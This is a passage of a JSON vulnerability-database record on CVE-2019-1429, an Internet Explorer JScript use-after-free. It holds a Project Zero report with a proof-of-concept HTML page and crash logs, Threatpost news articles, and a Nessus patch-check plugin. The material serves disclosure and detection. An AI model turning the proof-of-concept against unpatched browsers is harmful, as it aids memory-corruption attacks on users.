chance)\r\nFirst chance exceptions are reported before any exception handling.\r\nThis exception may be expected and handled.\r\neax=00000080 ebx=05ecc218 ecx=00000080 edx=00000001 esi=05f0c3c8 edi=05fb12e8\r\neip=6e25f52a esp=05ecc180 ebp=05ecc1b4 iopl=0 nv up ei pl zr na pe nc\r\ncs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246\r\njscript!PrepareInvoke+0x12a:\r\n6e25f52a 0fb707 movzx eax,word ptr [edi] ds:002b:05fb12e8=????\r\n\r\n0:009> k\r\n # ChildEBP RetAddr \r\n00 05ecc1b4 6e262b75 jscript!PrepareInvoke+0x12a\r\n01 05ecc2a8 6e2660ee jscript!VAR::InvokeByDispID+0x1c5\r\n02 05ecc4a0 6e26244a jscript!CScriptRuntime::Run+0x2e4e\r\n03 05ecc594 6e2622a1 jscript!ScrFncObj::CallWithFrameOnStack+0xaa\r\n04 05ecc5ec 6e25bec9 jscript!ScrFncObj::Call+0x81\r\n05 05ecc68c 6e262aed jscript!NameTbl::InvokeInternal+0x399\r\n06 05ecc78c 6e2a862c jscript!VAR::InvokeByDispID+0x13d\r\n07 05ecc800 6e2a8c2e jscript!GCProtectKeyAndCall+0xed\r\n08 05ecc898 6e2a93ce jscript!JSONApplyFilters+0x125\r\n09 05ecc90c 6e2ad9a2 jscript!JSONStringifyObject+0xac\r\n0a 05ecc9b4 6e269e3a jscript!JsJSONStringify+0x382\r\n0b 05ecca1c 6e25bec9 jscript!NatFncObj::Call+0xea\r\n0c 05eccabc 6e25e476 jscript!NameTbl::InvokeInternal+0x399\r\n0d 05eccc78 6e262aa5 jscript!VAR::InvokeByName+0x8f6\r\n0e 05eccd70 6e2660ee jscript!VAR::InvokeByDispID+0xf5\r\n0f 05eccf68 6e26244a jscript!CScriptRuntime::Run+0x2e4e\r\n10 05ecd05c 6e2622a1 jscript!ScrFncObj::CallWithFrameOnStack+0xaa\r\n11 05ecd0b4 6e257124 jscript!ScrFncObj::Call+0x81\r\n12 05ecd170 6e257f75 jscript!CSession::Execute+0x314\r\n13 05ecd1d0 6e256c83 jscript!COleScript::ExecutePendingScripts+0x2d5\r\n14 05ecd274 6e2569b9 jscript!COleScript::ParseScriptTextCore+0x2c3\r\n15 05ecd2a0 70209251 jscript!COleScript::ParseScriptText+0x29\r\n16 05ecd2d8 70122a27 MSHTML!CActiveScriptHolder::ParseScriptText+0x51\r\n17 05ecd348 70121fe2 MSHTML!CScriptCollection::ParseScriptText+0x182\r\n18 05ecd434 701226ee MSHTML!CScriptData::CommitCode+0x312\r\n19 05ecd4b0 7012153a MSHTML!CScriptData::Execute+0x1ba\r\n1a 05ecd4d0 701e99b6 MSHTML!CHtmScriptParseCtx::Execute+0xaa\r\n1b 05ecd524 70159c7d MSHTML!CHtmParseBase::Execute+0x186\r\n1c 05ecd544 70159599 MSHTML!CHtmPost::Broadcast+0xfd\r\n1d 05ecd66c 7017647d MSHTML!CHtmPost::Exec+0x339\r\n1e 05ecd68c 70176376 MSHTML!CHtmPost::Run+0x3d\r\n1f 05ecd6ac 70176308 MSHTML!PostManExecute+0x60\r\n20 05ecd6c0 70176279 MSHTML!PostManResume+0x6f\r\n21 05ecd6f0 70208447 MSHTML!CHtmPost::OnDwnChanCallback+0x39\r\n22 05ecd708 7015be1d MSHTML!CDwnChan::OnMethodCall+0x27\r\n23 05ecd780 702f1207 MSHTML!GlobalWndOnMethodCall+0x1bd\r\n24 05ecd7d0 7015c5a2 MSHTML!GlobalWndProc_SEH+0x317\r\n25 05ecd7ec 7562624b MSHTML!GlobalWndProc+0x52\r\n26 05ecd818 756174dc USER32!_InternalCallWinProc+0x2b\r\n27 05ecd8fc 7561661b USER32!UserCallWinProcCheckWow+0x3ac\r\n28 05ecd970 756163f0 USER32!DispatchMessageWorker+0x21b\r\n29 05ecd97c 717e6456 USER32!DispatchMessageW+0x10\r\n2a 05ecfb0c 717e73e3 IEFRAME!CTabWindow::_TabWindowThreadProc+0xa36\r\n2b 05ecfbcc 7223df6c IEFRAME!LCIETab_ThreadProc+0x403\r\n2c 05ecfbe4 7130289d msIso!_IsoThreadProc_WrapperToReleaseScope+0x1c\r\n2d 05ecfc1c 75520419 IEShims!NS_CreateThread::AutomationIE_ThreadProc+0x8d\r\n2e 05ecfc2c 7789662d KERNEL32!BaseThreadInitThunk+0x19\r\n2f 05ecfc88 778965fd ntdll!__RtlUserThreadStart+0x2f\r\n30 05ecfc98 00000000 ntdll!_RtlUserThreadStart+0x1b\r\n\r\n===========================================================", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://www.exploit-db.com/download/47707"}], "packetstorm": [{"lastseen": "2019-11-22T10:53:24", "bulletinFamily": "exploit", "description": "", "modified": "2019-11-21T00:00:00", "published": "2019-11-21T00:00:00", "id": "PACKETSTORM:155433", "href": "https://packetstormsecurity.com/files/155433/Microsoft-Internet-Explorer-Use-After-Free.html", "title": "Microsoft Internet Explorer Use-After-Free", "type": "packetstorm", "sourceData": "`IE: Use-after-free in JScript arguments during toJSON callback \n \nThere is a use-after-free issue in JSCript (triggerable via Internet Explorer) where the members of the 'arguments' object aren't tracked by the garbage collector during the 'toJSON' callback. Thus, during the 'toJSON' callback, it is possible to assign a variable to the 'arguments' object, have it garbage-collected (as long as it is not referenced anywhere else) and still access it later. Note that, like in some previously reported JSCript issues, this is a use-after-free on a JSCript variable (VAR structure), so in order to trigger a crash, the entire block of variables must be freed. \n \nPoC for Internet Explorer is below. I tested it on multiple Windows version with the latest security patches applied. \n \n=========================================================== \n \n<!-- saved from url=(0014)about:internet --> \n<meta http-equiv=\\\"X-UA-Compatible\\\" content=\\\"IE=8\\\"></meta> \n<script language=\\\"Jscript.Encode\\\"> \nvar spray = new Array(); \n \nfunction F() { \nalert('callback'); \n \n// 2. Create a bunch of objects \nfor (var i = 0; i < 20000; i++) spray[i] = new Object(); \n \n// 3. Store a reference to one of them in the arguments array \n// The arguments array isn't tracked by garbage collector \narguments[0] = spray[5000]; \n \n// 4. Delete the objects and call the garbage collector \n// All JSCript variables get reclaimed... \nfor (var i = 0; i < 20000; i++) spray[i] = 1; \nCollectGarbage(); \n \n// 5. But we still have reference to one of them in the \n// arguments array \nalert(arguments[0]); \n} \n \n// 1. Cause toJSON callback to fire \nvar o = {toJSON:F} \nJSON.stringify(o); \n \nalert('done'); \n \n</script> \n \n=========================================================== \n \n \nDebug log: \n \n=========================================================== \n \n(1cf4.154): Access violation - code c0000005 (first chance) \nFirst chance exceptions are reported before any exception handling. \nThis exception may be expected and handled. \neax=00000080 ebx=05ecc218 ecx=00000080 edx=00000001 esi=05f0c3c8 edi=05fb12e8 \neip=6e25f52a esp=05ecc180 ebp=05ecc1b4 iopl=0 nv up ei pl zr na pe nc \ncs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 \njscript!PrepareInvoke+0x12a: \n6e25f52a 0fb707 movzx eax,word ptr [edi] ds:002b:05fb12e8=???? \n \n0:009> k \n# ChildEBP RetAddr \n00 05ecc1b4 6e262b75 jscript!PrepareInvoke+0x12a \n01 05ecc2a8 6e2660ee jscript!VAR::InvokeByDispID+0x1c5 \n02 05ecc4a0 6e26244a jscript!CScriptRuntime::Run+0x2e4e \n03 05ecc594 6e2622a1 jscript!ScrFncObj::CallWithFrameOnStack+0xaa \n04 05ecc5ec 6e25bec9 jscript!ScrFncObj::Call+0x81 \n05 05ecc68c 6e262aed jscript!NameTbl::InvokeInternal+0x399 \n06 05ecc78c 6e2a862c jscript!VAR::InvokeByDispID+0x13d \n07 05ecc800 6e2a8c2e jscript!GCProtectKeyAndCall+0xed \n08 05ecc898 6e2a93ce jscript!JSONApplyFilters+0x125 \n09 05ecc90c 6e2ad9a2 jscript!JSONStringifyObject+0xac \n0a 05ecc9b4 6e269e3a jscript!JsJSONStringify+0x382 \n0b 05ecca1c 6e25bec9 jscript!NatFncObj::Call+0xea \n0c 05eccabc 6e25e476 jscript!NameTbl::InvokeInternal+0x399 \n0d 05eccc78 6e262aa5 jscript!VAR::InvokeByName+0x8f6 \n0e 05eccd70 6e2660ee jscript!VAR::InvokeByDispID+0xf5 \n0f 05eccf68 6e26244a jscript!CScriptRuntime::Run+0x2e4e \n10 05ecd05c 6e2622a1 jscript!ScrFncObj::CallWithFrameOnStack+0xaa \n11 05ecd0b4 6e257124 jscript!ScrFncObj::Call+0x81 \n12 05ecd170 6e257f75 jscript!CSession::Execute+0x314 \n13 05ecd1d0 6e256c83 jscript!COleScript::ExecutePendingScripts+0x2d5 \n14 05ecd274 6e2569b9 jscript!COleScript::ParseScriptTextCore+0x2c3 \n15 05ecd2a0 70209251 jscript!COleScript::ParseScriptText+0x29 \n16 05ecd2d8 70122a27 MSHTML!CActiveScriptHolder::ParseScriptText+0x51 \n17 05ecd348 70121fe2 MSHTML!CScriptCollection::ParseScriptText+0x182 \n18 05ecd434 701226ee MSHTML!CScriptData::CommitCode+0x312 \n19 05ecd4b0 7012153a MSHTML!CScriptData::Execute+0x1ba \n1a 05ecd4d0 701e99b6 MSHTML!CHtmScriptParseCtx::Execute+0xaa \n1b 05ecd524 70159c7d MSHTML!CHtmParseBase::Execute+0x186 \n1c 05ecd544 70159599 MSHTML!CHtmPost::Broadcast+0xfd \n1d 05ecd66c 7017647d MSHTML!CHtmPost::Exec+0x339 \n1e 05ecd68c 70176376 MSHTML!CHtmPost::Run+0x3d \n1f 05ecd6ac 70176308 MSHTML!PostManExecute+0x60 \n20 05ecd6c0 70176279 MSHTML!PostManResume+0x6f \n21 05ecd6f0 70208447 MSHTML!CHtmPost::OnDwnChanCallback+0x39 \n22 05ecd708 7015be1d MSHTML!CDwnChan::OnMethodCall+0x27 \n23 05ecd780 702f1207 MSHTML!GlobalWndOnMethodCall+0x1bd \n24 05ecd7d0 7015c5a2 MSHTML!GlobalWndProc_SEH+0x317 \n25 05ecd7ec 7562624b MSHTML!GlobalWndProc+0x52 \n26 05ecd818 756174dc USER32!_InternalCallWinProc+0x2b \n27 05ecd8fc 7561661b USER32!UserCallWinProcCheckWow+0x3ac \n28 05ecd970 756163f0 USER32!DispatchMessageWorker+0x21b \n29 05ecd97c 717e6456 USER32!DispatchMessageW+0x10 \n2a 05ecfb0c 717e73e3 IEFRAME!CTabWindow::_TabWindowThreadProc+0xa36 \n2b 05ecfbcc 7223df6c IEFRAME!LCIETab_ThreadProc+0x403 \n2c 05ecfbe4 7130289d msIso!_IsoThreadProc_WrapperToReleaseScope+0x1c \n2d 05ecfc1c 75520419 IEShims!NS_CreateThread::AutomationIE_ThreadProc+0x8d \n2e 05ecfc2c 7789662d KERNEL32!BaseThreadInitThunk+0x19 \n2f 05ecfc88 778965fd ntdll!__RtlUserThreadStart+0x2f \n30 05ecfc98 00000000 ntdll!_RtlUserThreadStart+0x1b \n \n=========================================================== \n \n \nThis bug is subject to a 90 day disclosure deadline. After 90 days elapse \nor a patch has been made broadly available (whichever is earlier), the bug \nreport will become visible to the public. \n \n \nRelated CVE Numbers: CVE-2019-1429. \n \n \n \nFound by: ifratric@google.com \n \n`\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/155433/GS20191121220350.txt"}], "threatpost": [{"lastseen": "2020-06-02T22:14:38", "bulletinFamily": "info", "description": "A critical bug in a Microsoft scripting engine, under active attack, has been patched as part of Microsoft\u2019s Patch Tuesday security roundup.\n\nThe vulnerability exists in Internet Explorer and allows an attacker to execute rogue code if a victim is coaxed into visiting a malicious web page, or, if they are tricked into opening a specially crafted Office document.\n\n\u201cAn attacker who successfully exploits the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker\u2026could take control of an affected system,\u201d Microsoft [wrote in its advisory](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1429>).\n\nUnder an Office document attack scenario, Microsoft said an adversary might embed an ActiveX control marked \u201csafe for initialization\u201d in an Office document. If initialized, the malicious document could then directed to a rogue website, booby-trapped with specially crafted content that could exploit the vulnerability. \n[](<https://threatpost.com/newsletter-sign/>)The bug ([CVE-2019-1429](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1429>)), first identified by Google Project Zero, is believed to be actively exploited in the wild, according to the computing giant.\n\n**November Patch Tuesday Tackles Additional Critical and Important Bugs**\n\nIn total, Microsoft issued 75 CVEs that included 11 critical and 64 important.\n\nOne of the critical bugs includes an Excel security feature bypass flaw ([CVE-2019-1457](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1457>)) which [was publicly disclosed at the end of October](<https://threatpost.com/office-for-mac-malicious-sylk-files/149823/>) and exploited as a zero-day.\n\n\u201c[This] is a security feature bypass in Microsoft Office for Mac due to improper enforcement of macro settings in Excel documents,\u201d explained Satnam Narang, senior research engineer at Tenable, in an email analysis of Patch Tuesday. \u201cAn attacker would need to create a specially crafted Excel document using the SYLK (SYmbolic LinK) file format, and convince a user to open such a file using a vulnerable version of Microsoft Office for Mac.\u201d\n\nEarlier this month, Microsoft warned that malicious SYLK files [are sneaking past endpoint defenses](<https://threatpost.com/office-for-mac-malicious-sylk-files/149823/>) even when the \u201cdisable all macros without notification\u201d function is turned on. This leaves systems vulnerable to a remote, unauthenticated attackers who can execute arbitrary code.\n\n\u201cXLM macros can be incorporated into SYLK files,\u201d wrote the [United States Computer Emergency Readiness Team](<https://kb.cert.org/vuls/id/125336/>) in a warning earlier this month. \u201cMacros in the SYLK format are problematic in that Microsoft Office does not open in Protected View to help protect users.\u201d\n\n**Microsoft Trusted Platform Module Guidance and Housecleaning**\n\nThe Patch Tuesday advisories also included non-CVE updates such as [one regarding a vulnerability in Trusted Platform Module](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV190024>) (TPM) chipset. The TPM vulnerability is a third-party bug not connected to the Windows operating system.\n\n\u201cCurrently no Windows systems use the vulnerable algorithm. Other software or services you are running might use this algorithm. Therefore if your system is affected [it] requires the installation of TPM firmware updates,\u201d wrote Microsoft in its advisory, [ADV190024](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV190024>).\n\nThe vulnerability weakens key confidentiality protection for the Elliptic Curve Digital Signature Algorithm or ECDSA. The technology is used for a variety of [different applications such as a Bitcoin-related](<https://en.bitcoin.it/wiki/Elliptic_Curve_Digital_Signature_Algorithm>) app where it is leveraged to ensure that funds can only be [spent by their rightful owners](<https://en.bitcoin.it/wiki/Elliptic_Curve_Digital_Signature_Algorithm>).\n\nChris Goettl, researcher with Ivanti, said this November Patch Tuesday should also serve as a reminder to a number of key Windows end-of-life dates.\n\n\u201cThere are some Windows end-of-life dates that users should be aware of both this month and coming in January,\u201d Goettl wrote. He added there are \u201csome additional details on extended support for Windows 7 and Server 2008\\2008 R2 from a [blog post in November](<https://techcommunity.microsoft.com/t5/Windows-IT-Pro-Blog/How-to-get-Extended-Security-Updates-for-eligible-Windows/ba-p/917807>) that discuss how to get access and ensure your systems are prepared for extended support if you are continuing on.\u201d\n\n**_What are the top risks to modern enterprises in the peak era of data breaches? Find out: Join breach expert Chip Witt from SpyCloud and Threatpost senior editor Tara Seals, in our upcoming free _**[**_Threatpost webinar_**](<https://attendee.gotowebinar.com/register/3127445778613605890?source=ART>)**_, \u201cTrends in Fortune 1000 Breach Exposure.\u201d _**[**_Click here to register_**](<https://attendee.gotowebinar.com/register/3127445778613605890?source=ART>)**_._**\n", "modified": "2019-11-12T21:35:20", "published": "2019-11-12T21:35:20", "id": "THREATPOST:5293ED4A454EC6487F8AA9DB9A0FF180", "href": "https://threatpost.com/microsoft-patches-rce-bug/150136/", "type": "threatpost", "title": "Microsoft Patches RCE Bug Actively Under Attack", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-09T11:22:56", "bulletinFamily": "info", "description": "Google has registered a significant drop in government-backed cyberattacks against its properties and the people who use its products.\n\nGoogle sends out warnings if it detects that an account is a target of government-backed phishing or malware attempts. For 2019, the internet giant sent almost 40,000 warnings \u2013 which, while a large number, is still a nearly 25 percent drop from the year before.\n\n**Nation-State Trends**\n\nIn terms of trends amongst the warnings, the analysis showed that main targets included, perhaps unsurprisingly, geopolitical rivals, government officials, journalists, dissidents and activists.\n\nIn 2019, about 20 percent of accounts that received a warning were targeted multiple times by attackers. Google also uncovered that phishing and zero-day exploits continue to be APT weapons of choice.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nOn the former front, Google researchers saw a growing trend emerge towards impersonating news outlets and journalists, especially when it comes to attackers from Iran and North Korea.\n\n\u201cFor example, attackers impersonate a journalist to seed false stories with other reporters to spread disinformation,\u201d explained Toni Gidwani, security engineering manager at the company\u2019s Threat Analysis Group (TAG), writing [in an overview](<https://blog.google/technology/safety-security/threat-analysis-group/identifying-vulnerabilities-and-protecting-you-phishing/amp/>) of nation-state trends, published last week. \u201cIn other cases, attackers will send several benign emails to build a rapport with a journalist or foreign-policy expert before sending a malicious attachment in a follow up email.\u201d\n\nOn the zero-day front, TAG discovered bugs affecting Android, Chrome, iOS, Internet Explorer and Windows over the course of last year, including CVE-2020-0674. This is a [memory-corruption vulnerability disclosed in late January](<https://threatpost.com/microsoft-zero-day-actively-exploited-patch/152018/>), a critical flaw for most Internet Explorer versions, allowing remote code-execution and complete takeover.\n\nOther notable bugs included [CVE-2018-8653](<https://threatpost.com/microsoft-ie-zero-day-gets-emergency-patch/140185/>), [CVE-2019-0676](<https://threatpost.com/microsoft-patches-zero-day-browser-bug-under-active-attack/141755/>), [CVE-2019-1367](<https://threatpost.com/microsoft-internet-explorer-zero-day-flaw-addressed-in-out-of-band-security-update/148584/>) and [CVE-2019-1429](<https://threatpost.com/microsoft-patches-rce-bug/150136/>) in Internet Explorer; [CVE-2019-5786](<https://threatpost.com/microsoft-patches-two-win32k-bugs-under-active-attack/142742/>) in Chrome; and [CVE-2019-0808](<https://threatpost.com/microsoft-patches-two-win32k-bugs-under-active-attack/142742/>) in Windows Kernel.\n\n**Zero-Day Details**\n\nThree bugs (CVE-2018-8653, CVE-2019-1367 and CVE-2020-0674) are vulnerabilities inside jscript.dll, Gidwani said. \u201cTherefore all exploits enabled IE8 rendering and used JScript.Compact as JS engine. In most Internet Explorer exploits, attackers abused the Enumerator object in order to gain remote code execution.\u201d\n\nMeanwhile, CVE-2019-0676 \u201cenables attackers to reveal presence or non-presence of files on the victim\u2019s computer; this information was later used to decide whether or not a second stage exploit should be delivered,\u201d according to the writeup.\n\nAnd, \u201cthe attack vector for CVE-2019-1367 was rather atypical as the exploit was delivered from an Office document abusing the online video embedding feature to load an external URL conducting the exploitation.\u201d\n\nIn one campaign, a single APT was seen using five zero-day exploits, delivered using watering-hole attacks, links to malicious websites and inemail attachments in targeted spear-phishing campaigns.\n\n\u201cFinding this many zero-day exploits from the same actor in a relatively short time frame is rare,\u201d said Gidwani. \u201cThe majority of targets we observed were from North Korea or individuals who worked on North Korea-related issues.\u201d\n\nNonetheless, he said that it\u2019s encouraging to see the decline in attacks.\n\n\u201cOne reason for this decline is that our new protections are working,\u201d said Gidwani. \u201cAttackers\u2019 efforts have been slowed down and they\u2019re more deliberate in their attempts, meaning attempts are happening less frequently as attackers adapt.\u201d\n\n[](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>)\n\n_**Do you suffer from Password Fatigue? On [Wednesday April 8 at 2 p.m. ET](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) join **_**_Duo Security and Threatpost as we explore a [passwordless](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) future. This [FREE](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) webinar maps out a future where modern authentication standards like WebAuthn significantly reduce a dependency on passwords. We\u2019ll also explore how teaming with Microsoft can reduced reliance on passwords. [Please register here](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) and dare to ask, \u201c[Are passwords overrated?](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>)\u201d in this sponsored webinar. _**\n", "modified": "2020-03-30T20:53:22", "published": "2020-03-30T20:53:22", "id": "THREATPOST:C63BDB5BFB4AECB9F2F95F69E238122B", "href": "https://threatpost.com/nation-state-attacks-google-analysis/154295/", "type": "threatpost", "title": "Nation-State Attacks Drop in Latest Google Analysis", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2020-08-01T04:58:12", "bulletinFamily": "scanner", "description": "The Internet Explorer installation on the remote host is\nmissing security updates. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2019-1390)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2019-1429)", "modified": "2020-08-02T00:00:00", "id": "SMB_NT_MS19_NOV_INTERNET_EXPLORER.NASL", "href": "https://www.tenable.com/plugins/nessus/130912", "published": "2019-11-12T00:00:00", "title": "Security Updates for Internet Explorer (November 2019)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(130912);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2020/01/17\");\n\n script_cve_id(\"CVE-2019-1390\", \"CVE-2019-1429\");\n script_xref(name:\"MSKB\", value:\"4525243\");\n script_xref(name:\"MSKB\", value:\"4525234\");\n script_xref(name:\"MSKB\", value:\"4525106\");\n script_xref(name:\"MSKB\", value:\"4525235\");\n script_xref(name:\"MSKB\", value:\"4525246\");\n script_xref(name:\"MSFT\", value:\"MS19-4525243\");\n script_xref(name:\"MSFT\", value:\"MS19-4525234\");\n script_xref(name:\"MSFT\", value:\"MS19-4525106\");\n script_xref(name:\"MSFT\", value:\"MS19-4525235\");\n script_xref(name:\"MSFT\", value:\"MS19-4525246\");\n\n script_name(english:\"Security Updates for Internet Explorer (November 2019)\");\n script_summary(english:\"Checks for Microsoft security updates.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Internet Explorer installation on the remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Internet Explorer installation on the remote host is\nmissing security updates. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2019-1390)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2019-1429)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4525243/windows-8-1-kb4525243\");\n # https://support.microsoft.com/en-us/help/4525234/windows-server-2008-update-kb4525234\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f741cc55\");\n # https://support.microsoft.com/en-us/help/4525106/cumulative-security-update-for-internet-explorer\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d314c950\");\n # https://support.microsoft.com/en-us/help/4525235/windows-7-update-kb4525235\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f8b9842b\");\n # https://support.microsoft.com/en-us/help/4525246/windows-server-2012-update-kb4525246\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ad214b5b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released the following security updates to address this issue: \n -KB4525243\n -KB4525234\n -KB4525106\n -KB4525235\n -KB4525246\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-1429\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/11/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/11/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/11/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\n\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS19-11';\nkbs = make_list(\n '4525106',\n '4525234',\n '4525235',\n '4525243',\n '4525246'\n);\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nos = get_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2', win7:'1', win8:'0', win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\nif (\"Vista\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nif (hotfix_check_server_core() == 1) audit(AUDIT_WIN_SERVER_CORE);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n # Windows 8.1 / Windows Server 2012 R2\n # Internet Explorer 11\n hotfix_is_vulnerable(os:\"6.3\", sp:0, file:\"mshtml.dll\", version:\"11.0.9600.19540\", min_version:\"11.0.9600.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4525106\") ||\n\n # Windows Server 2012\n # Internet Explorer 10\n hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"mshtml.dll\", version:\"10.0.9200.22906\", min_version:\"10.0.9200.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4525106\") ||\n # Internet Explorer 11\n hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"mshtml.dll\", version:\"11.0.9600.19540\", min_version:\"11.0.9600.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4525106\") ||\n \n # Windows 7 / Server 2008 R2\n # Internet Explorer 11\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"mshtml.dll\", version:\"11.0.9600.19540\", min_version:\"11.0.9600.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4525106\") ||\n\n # Windows Server 2008\n # Internet Explorer 9\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"mshtml.dll\", version:\"9.0.8112.21385\", min_version:\"9.0.8112.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4525106\")\n)\n{\n report = '\\nNote: The fix for this issue is available in either of the following updates:\\n';\n report += ' - KB4525106 : Cumulative Security Update for Internet Explorer\\n';\n if(os == \"6.3\")\n {\n report += ' - KB4525243 : Windows 8.1 / Server 2012 R2 Monthly Rollup\\n';\n hotfix_add_report(bulletin:'MS19-11', kb:'4525243', report);\n }\n else if(os == \"6.2\")\n {\n report += ' - KB4525246 : Windows Server 2012 Monthly Rollup\\n';\n hotfix_add_report(bulletin:'MS19-11', kb:'4525246', report);\n }\n else if(os == \"6.1\")\n {\n report += ' - KB4525235 : Windows 7 / Server 2008 R2 Monthly Rollup\\n';\n hotfix_add_report(bulletin:'MS19-11', kb:'4525235', report);\n }\n else if(os == \"6.0\")\n {\n report += ' - KB4525234 : Windows Server 2008 Monthly Rollup\\n';\n hotfix_add_report(bulletin:'MS19-11', kb:'4525234', report);\n }\n set_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-08-01T04:58:09", 